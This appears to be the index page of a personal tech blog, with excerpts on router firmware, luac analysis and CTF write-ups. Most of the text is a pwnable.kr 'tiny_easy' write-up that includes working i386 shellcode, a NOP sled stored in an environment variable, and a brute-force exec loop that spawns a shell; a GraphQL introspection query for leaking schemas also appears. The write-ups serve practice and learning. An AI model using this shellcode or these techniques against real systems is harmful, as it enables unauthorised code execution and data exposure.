Posted Updated Misc6 minutes read (About 972 words)

魔改解决超级雕rgb fusion鼠标卡顿问题

前言

仅供学习研究。

上个星期在海鲜市场收了一块技嘉超级雕6800XT,准备用来组黑苹果。

系统是Windows 11,到手之后安装了安装显卡驱动和技嘉rgb控制软件rgb fusion 2.0(B22.0414.1,官网最新版),小屏幕倒是挺好看的,但鼠标滑动总觉得时有点卡顿,用鼠标连续画圈最为明显(眼睛比较敏感)。

大约1秒卡顿一次。如下图所示,第一张图正常,第二张图第一个鼠标位置到第二个鼠标位置滑动距离过长,卡顿:

Read more
Posted Updated pwn10 minutes read (About 1519 words)

记一次luac分析

前言

某mips架构的路由器上的lua脚本a.lua,被编译成了luac二进制格式。初步分析发现指定lua使用固件中的共享库liblua.so.5.1.5可运行该luac文件,同架构的官方openwrt则不能运行该luac,所以判断出lialua.so.5.1.5被魔改了。

Read more
Posted Updated Linuxan hour read (About 9226 words)

折腾:无线宝鲁班openwrt 21.02.1

免责声明

  1. 仅用于测试与学习研究,作者没有对该设备进行任何形式的“破解”,所有信息都是通过正常的方式获取。
  2. 如果任何单位或个人认为本文内容可能涉嫌侵犯其权利,则应及时联系作者并要求删除相关内容。
  3. 作者对本文带来的潜在问题概不负责,包括但不限于由任何错误导致的任何损失或损害。

前言

前几天在京东上买了个京东云无线宝鲁班,硬件配置如下:

1
2
3
4
5
CPU:MT7621A
内存:南亚512MB
闪存:XM25QH128C  128Mit/16MB
无线:MT7975DN + MT7905DAN
网口:全千兆LLLW

本来天天放那边跑分换京豆的,但是这官方固件实在有点用不下去,所以给它搞个适配个openwrt吧。

Read more
Posted Updated pwn8 minutes read (About 1150 words)

pwnable.kr ELF writeup

0x01 分析

首先ssh上去看看。

elf.py:

1
2
3
4
5
6
7
8
9
10
...
libc = CDLL('libc.so.6')
flag = CDLL('./libflag.so')

...
for i in xrange(25):
        sys.stdout.write('addr?:')
        sys.stdout.flush()
        addr = int(raw_input(), 16)
        libc.write(1, c_char_p(addr), 32)

有25次机会,每次可以读进程地址空间的32字节…

再看看gen.py。

Read more
Posted Updated pwn3 minutes read (About 468 words)

pwnable.kr rootkit writeup

0x01 Analysis

rootkit is another challenge about kernel exploits after syscall.

After connected to host, I found that the kernel load rootkit module at boot. 

1
[    3.337631] rootkit: module license 'unspecified' taints kernel.

Then, I use ida to disassembly the rootkit.ko.

The module disable write protection, and replace original syscall such as sys_open to sys_open_hooked by write syscall table(0xc15fa020).

The sys_open_hooked syscall will check whether the string of the filename has a flag substring.
If there not, then the original sys_open is called.
If there is, it returns a fd with a value of -1, then the file opening failed.

Of cource, other sys_call such as sys_symlink will failed also.

1
2
3
/tmp # ln -s ../flag ./
[ 5234.521789] You will not see the flag...
ln: ./flag: Operation not permitted
Read more
Posted Updated CTF18 minutes read (About 2673 words)

hackgame-2021-wp

0x01 总结

第一次打ctf,2250分,rank109,math类一题不会…有待提高

Read more
Posted Updated CTFa few seconds read (About 25 words)

graphql leak

0x01

  1. find all type
    1
    2
    3
    4
    5
    6
    7
    {
      __schema {
        types {
          name
        }
      }
    }
  2. find all field of known type
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    {
      __type (name: "Query") {
        name
        fields {
          name
          type {
            name
            kind
            ofType {
              name
              kind
            }
          }
        }
      }
    }
Posted Updated pwn5 minutes read (About 752 words)

pwnable.kr tiny_easy writeup

0x01 Check security

1
2
3
4
5
6
7
$ checksec tiny_easy
[*] '/home/ubuntu/pwn/tiny_easy/tiny_easy'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)

NX disasbled.

0x02 Disassemble

1
2
3
4
08048054 pop     eax
08048055 pop     edx
08048056 mov     edx, [edx]
08048058 call    edx

…?
What a tiny ELF..

0x03 Debug

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
(gdb) b *0x08048056
Breakpoint 1 at 0x8048056
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/ubuntu/pwn/tiny_easy/tiny_easy

Breakpoint 2, 0x08048056 in ?? ()
(gdb) info r
eax            0x1                 1
ecx            0x0                 0
edx            0xffff8943          -30397
ebx            0x0                 0
esp            0xffff8818          0xffff8818
ebp            0x0                 0x0
esi            0x0                 0
edi            0x0                 0
eip            0x8048056           0x8048056
eflags         0x202               [ IF ]
cs             0x23                35
ss             0x2b                43
ds             0x2b                43
es             0x2b                43
fs             0x0                 0
gs             0x0                 0
(gdb) x/7s $edx
0xffff8943:     "/home/ubuntu/pwn/tiny_easy/tiny_easy"
0xffff8968:     "SHELL=/bin/bash"
0xffff8978:     "WSL_DISTRO_NAME=Ubuntu-20.04"
0xffff8995:     "NAME=DESKTOP-TR6SWQE"
0xffff89aa:     "PWD=/home/ubuntu/pwn/tiny_easy"
0xffff89c9:     "LOGNAME=ubuntu"
0xffff89d8:     "_=/usr/bin/gdb"
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x6d6f682f in ?? ()

Obviously, the “tiny_easy” move ‘/hom’ to $edx, and then call edx let the program jump to address 0x6d6f682f(/hom), then tiggered a segmentation fault.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ exec --help
exec: exec [-cl] [-a name] [command [arguments ...]] [redirection ...]
    Replace the shell with the given command.

    Execute COMMAND, replacing this shell with the specified program.
    ARGUMENTS become the arguments to COMMAND.  If COMMAND is not specified,
    any redirections take effect in the current shell.

    Options:
      -a name   pass NAME as the zeroth argument to COMMAND
      -c        execute COMMAND with an empty environment
      -l        place a dash in the zeroth argument to COMMAND

    If the command cannot be executed, a non-interactive shell exits, unless
    the shell option `execfail' is set.

    Exit Status:
    Returns success unless COMMAND is not found or a redirection error occurs.

The command exec with -a argument can help us pass the specified argv[0] to COMMAND, which mean that we can put shellcode into the environment variable, and then pass a guessed shellcode address to argv[0], then get the shell by brute force.

But the problem is, how to make a shellcode?

I guess we need pwntools…

1
2
3
4
5
6
7
$ python3
Python 3.8.10 (default, Jun  2 2021, 10:49:15)
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> asm(shellcraft.i386.linux.sh())
b'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'

And the shellcode address:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
[email protected]:~$ export A=$(python -c 'print("jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80")')
[email protected]:~$ gdb ./tiny_easy
(gdb) b *0x8048058
Breakpoint 1 at 0x8048058
(gdb) r
Starting program: /home/tiny_easy/tiny_easy
Breakpoint 1, 0x08048058 in ?? ()
(gdb) info r
eax            0x1      1
ecx            0x0      0
edx            0x6d6f682f       1836017711
ebx            0x0      0
esp            0xffaaac18       0xffaaac18
ebp            0x0      0x0
esi            0x0      0
edi            0x0      0
eip            0x8048058        0x8048058
eflags         0x202    [ IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
k0             0x0      0
k1             0x0      0
k2             0x0      0
k3             0x0      0
k4             0x0      0
k5             0x0      0
k6             0x0      0
k7             0x0      0
(gdb) x/8xw 0xffaaac18
0xffaaac18:     0x00000000      0xffaabd9e      0xffaabdcd      0xffaabde3
0xffaaac28:     0xffaabdf3      0xffaabe07      0xffaabe2b      0xffaabe3f
(gdb) x/16s 0xffaabd9e
0xffaabd9e:     "A=jhh///sh/bin\211\343h\001\001\001\001\201\064$ri\001\001\061\311Qj\004Y\001\341Q\211\341\061\322j\vX ̀"
0xffaabdcd:     "XDG_SESSION_ID=118569"
0xffaabde3:     "SHELL=/bin/bash"
0xffaabdf3:     "TERM=xterm-256color"
0xffaabe07:     "SSH_CLIENT=112.86.218.22 48280 2222"
0xffaabe2b:     "SSH_TTY=/dev/pts/41"
0xffaabe3f:     "USER=tiny_easy"
0xffaabe4e:     "COLUMNS=120"
0xffaabe5a:     "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin"
0xffaabec2:     "MAIL=/var/mail/tiny_easy"
0xffaabedb:     "_=/usr/bin/gdb"
0xffaabeea:     "PWD=/home/tiny_easy"
0xffaabefe:     "LANG=en_US.UTF-8"
0xffaabf0f:     "LINES=30"
0xffaabf18:     "HOME=/home/tiny_easy"
0xffaabf2d:     "SHLVL=1"

Ok, use 0xffaabda0 as argv[0].

0x04 EXP

Befor do brute force, we should fill the shellcode by nop(\x90), to improve the success rate of call edx.

1
export A=$(python -c 'print("\x90" * 30000 + "jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80")'); for i in {1..1000}; do bash -c "exec -a $(python -c 'print("\xa0\xbd\xaa\xff")') ./tiny_easy"; done
Follow

Links

Categories

Recents

Archives

Tags

C/C++10
CTF7
Linux9
Misc9
Network4
Python7
Raspiberry Pi5
pwn6
×